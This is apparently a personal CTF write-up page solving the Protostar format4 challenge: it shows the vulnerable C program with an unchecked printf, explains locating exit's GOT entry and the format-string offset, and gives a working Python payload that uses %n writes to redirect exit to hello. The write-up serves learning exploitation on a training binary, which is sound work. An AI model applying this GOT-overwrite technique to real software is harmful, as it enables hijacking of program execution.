🌌
N/B Writeups
  • CTF Writeups
  • CTFs
    • 2019
      • OverTheWire Advent
    • 2020
      • Midnight Sun
      • Things I learned from DarkCTF
  • Pwnable.kr
    • 01 - fd
    • 02 - col
    • 03 - bof
    • 04 - flag
    • 05 - passcode
    • 06 - random
    • 07 - input
    • 08 - leg
    • 09 - mistake
    • 10 - Shellshock
    • 11 - coin1
    • 12 - blackjack
    • 13 - lotto
    • 14 - cmd1
    • 15 - cmd2
    • 16 - uaf
    • 17 - memcpy
    • 18 - asm
    • 20 - blukat
    • 21 - horcruxes
    • 33 - echo1
    • 34 - echo2
    • 43 - coin2
  • More Pwn
    • Protostar - format4
  • Lord of SQLI
    • Lord of SQLI
Powered by GitBook
On this page
  • Analyzing the source code
  • Gathering Information
  • Exploiting

Was this helpful?

  1. More Pwn

Protostar - format4

Analyzing the source code

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void hello()
{
  printf("code execution redirected! you win\n");
  _exit(1);
}

void vuln()
{
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);

  printf(buffer);

  exit(1);  
}

int main(int argc, char **argv)
{
  vuln();
}

Gathering Information

Before we can write the exploit itself we need to answer some questions:

What is the address of hello?

Grab it using gdb:

What is the location of exit's got.plt?

Using objdump -TR we can see it's 0x08049724.

You can also use gdb to find exit@plt with i functions exit, print its contents with disas and see than the first line jumps to what's located in 0x08049724.

At which offset can we input values?

To find the offset at which we are starting to read from the buffer try something in the lines of:

We can use variables starting with the fourth.

Exploiting

We can write an address, and %n will write data there! But what will be written?

The value we need to write is huge! To get over it we will write the data in three parts - LSB byte, two middle bytes, and MSB byte. To set the offset we need to insert values between the %n's, that will be done using %SIZEx which translates to the padding of SIZE.

#!/usr/bin/python3

import sys

exit_lsb_address = b"\x24\x97\x04\x08"
exit_mid_address = b"\x25\x97\x04\x08"
exit_msb_address = b"\x27\x97\x04\x08"

lsb_offset = b"%167x "
mid_offset = b"%974x "
msb_offset = b"%130x "

payload = b""
payload += exit_lsb_address + exit_mid_address + exit_msb_address + \
           lsb_offset + "%4$n ".encode() + mid_offset + "%5$n ".encode() + \
           msb_offset +  "%6$n ".encode()

sys.stdout.buffer.write(payload)

Two notes

  • The overall structure of the payload is:

    • Three write addresses

    • 3 Times - Offset to achieve good value, write to address with %INDEXn [INDEX which we discovered earlier].

  • I used sys.stdout.buffer.write to print the exact values without UTF-8. There are other ways to achieve this.

Previous43 - coin2NextLord of SQLI

Last updated 4 years ago

Was this helpful?

As this is a challenge we will attack through the prinf in line 20. This command is immediately followed by an exit so changing the return address of the function is of no use. Instead, we are going to manipulate the registry of exit , forcing it to call hello instead.

In printf's , under the bugs section it says:

...the number of characters written so far is stored. []

format string
got.plt
man page
source